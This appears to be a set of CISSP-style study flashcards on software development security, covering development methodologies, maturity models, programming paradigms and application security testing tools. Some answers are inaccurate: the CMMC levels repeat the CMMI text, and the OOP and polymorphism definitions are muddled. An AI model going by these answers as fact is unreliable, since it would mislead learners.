Domain 8: Software Development Security

Question 1

Extreme Programming (XP)

Answer 1

Introduces the use of integrated teams including developers,
customers, and managers to drive the delivery of high-value software features.
- Utilizes a concept known as pair programming, which pairs developers. The developers take turns writing
code and offering advice/input, with the goal of achieving higher quality code by providing extra oversight and
knowledge to draw upon.

Question 2

Test-Driven Development (TDD)

Answer 2

First a test is written, then it is run. If it fails, code is written or refactored as needed to make the test succeed; the ultimate goal is to ensure that all tests pass.

Question 3

DevOps Phases (8)

Answer 3

• Plan
• Code
• Build
• Test
• Release
• Deploy
• Operate
• Monitor

Question 4

DevSecOps Manifesto (9 canons)

Answer 4

• Leaning in - over Always Saying “No”
• Data & Security Science - over Fear, Uncertainty and Doubt
• Open Contribution & Collaboration - over Security-Only Requirements
• Consumable Security Services with APIs - over Mandated Security Controls & Paperwork
• Business Driven Security Scores - over Rubber Stamp Security
• Red & Blue Team Exploit Testing - over Relying on Scans & Theoretical Vulnerabilities
• 24x7 Proactive Security Monitoring - over Reacting after being Informed of an Incident
• Shared Threat Intelligence - over Keeping Info to Ourselves
• Compliance Operations - over Clipboards & Checklists

Question 5

Capability Maturity Model Integration (5 Maturity Levels)

Answer 5

1. Initial - Processes are unpredictable and largely reactive.
2. Managed - Processes are characterized or documented for projects and are often reactive.
3. Defined - Processes are characterized for the organization and are proactive.
4. Quantitatively managed - Processes are measured and controlled by the measurements.
5. Optimizing - The organization focuses on process improvement.

• run by ISACA

Question 6

The Software Assurance Maturity Model (SAMM) - 5 Phases

Answer 6

SAMM is a prescriptive framework for implementing a software security program and focuses on integrating security activities into an existing SDLC.
1. Governance
2. Design
3. Implementation
4. Verification
5. Operations

Question 7

Building Security-In Maturity Model (BSIMM) - 4 Domains

Answer 7

Focused on determining the current state of secure software creation capabilities, identifying improvement opportunities, and prioritizing efforts to improve secure software development.
 Governance
 Intelligence
 Software Security Development Lifecycle (SSDL)
 Deployment

Question 8

Cybersecurity Maturity Model Certification (CMMC) - 5 Maturity Levels

Answer 8

CMMC is designed for contractors who are handling sensitive information, known as controlled unclassified information (CUI), on behalf of government clients.
1. Initial - Processes are unpredictable and largely reactive.
2. Managed - Processes are characterized or documented for projects and are often reactive.
3. Defined - Processes are characterized for the organization and are proactive.
4. Quantitatively managed - Processes are measured and controlled by the measurements.
5. Optimizing - The organization focuses on process improvement.

Question 9

Compiled Programming Languages

Answer 9

Are translated into machine-readable form before being run in a process known as compiling.
- Doesn’t expose source code
- C# and Swift are examples of compiled languages.

Question 10

Interpreted Programming Languages

Answer 10

Are translated into machine readable format when they are run, also known as on the fly. This makes interpreted code more portable across system types.
- Exposes source code and requires additional operational overhead.
- JavaScript and Python are examples of interpreted languages.

Question 11

Static Type Checking

Answer 11

Performed by a compiler to verify if the program’s functionality matches type constraints for data inputs.

Question 12

Dynamic Type Checking

Answer 12

Checks the values stored in a program’s variables as it is running to ensure data matches the expected type.
- Languages that implement these features are known as type-safe, and they support important security goals related to integrity of data.

Question 13

Declarative Programming

Answer 13

Expresses the logic of a task without describing how it should be executed; in these languages, a system must interpret the logic and execute appropriate tasks.

Question 14

Imperative paradigm of programming

Answer 14

Uses statements or commands that change a program’s state, similar to issuing imperative commands in human languages like “stand up” or “study for the CISSP.”

Question 15

Procedural programming

Answer 15

Related to the imperative paradigm and is based on the concept of a program calling procedures, which are similar to routines or subroutines.

Question 16

Block structured programming

Answer 16

Languages utilize bocks as an organizational unit; the scope of program elements like variables and functions is restricted to the block to prevent conflicts with other elements elsewhere in the code.

Question 17

Object-oriented programming (OOP)

Answer 17

Instead of writing specific commands to gather input data and perform procedures on it, OOP treats both data and functions as objects, known as classes, which can be linked together through defined interactions.

Question 18

Encapsulation

Answer 18

This is also known as data hiding and is effectively a way of isolating data from being accidentally mishandled. Direct access to a class can be denied to external objects, thereby restricting access to only approved functions known as methods.

Question 19

Inheritance

Answer 19

Classes of data objects can have subclasses that inherit some or all of the main class’s characteristics, such as access restrictions.

Question 20

Polymorphism in Programming

Answer 20

This term refers to the multiple (poly) forms (morphs) an object may take when being created or instantiated. Instantiating a new object from an existing object typically duplicates the attributes and methods of the existing object, but data of a different type may cause security concerns because the new data type requires different methods.

Question 21

Polyinstantiation

Answer 21

This term means making multiple (poly) copies (instances) of an object, typically with the goal of supporting different levels of confidentiality and integrity for that object.

Question 22

Hypertext Markup Language (HTML)

Answer 22

Specifies layout or display elements of text delivered to a web browser.

Question 23

Cascading Style Sheets (CSS)

Answer 23

Allows definition for how a web document should be styled for display, including fonts, color, and layout/spacing of elements on the page.

Question 24

JavaScript

Answer 24

Provides interactive applications inside a web browser on a client system, often for displaying and manipulating data on the user’s screen.

Question 25

Python

Answer 25

A high-level interpreted language that can be used for a variety of uses ranging from small personal programs to large web applications.

Question 26

Static application security testing (SAST)

Answer 26

SAST evaluates source code and other nonrunning application elements like compiled binaries. Testing is performed in development or testing environments, which means there is no impact to live production environments.

Question 27

Dynamic application security testing (DAST)

Answer 27

They can typically run against any application with an interface or API regardless of underlying language and are not as tightly integrated with an IDE, which means access is easier for non developers.

Question 28

Interactive application security testing (IAST)

Answer 28

• Combines elements of SAST, DAST, and penetration testing, often using complex algorithms and machine learning to analyze source code and correlate vulnerabilities discovered during dynamic testing

Question 29

Runtime application self-protection (RASP)

Answer 29

Executes alongside the application as it is run; RASP is also less of a testing tool but is often incorporated into overall application security to complement SAST and DAST. A RASP security tool integrates with an application and analyzes the program’s execution to spot unusual or unexpected behavior, and then it takes corrective action.